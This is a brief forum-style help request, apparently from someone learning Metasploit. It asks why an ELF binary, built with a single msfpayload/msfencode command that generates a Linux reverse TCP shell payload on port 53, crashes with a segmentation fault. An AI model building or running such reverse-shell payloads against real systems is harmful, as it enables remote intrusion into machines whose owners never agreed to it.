hello there ,

I tried follow ,

msfpayload linux/x86/shell_reverse_tcp LPORT=53 R | msfencode -b '' -t elf -o shell

but when I execute ./shell

the follow message appears

segmentation fault

in -b param i tried too -b '\x00'
what are wrong ?

I tried in 32 and 64 bit architeture

Thanks in advanced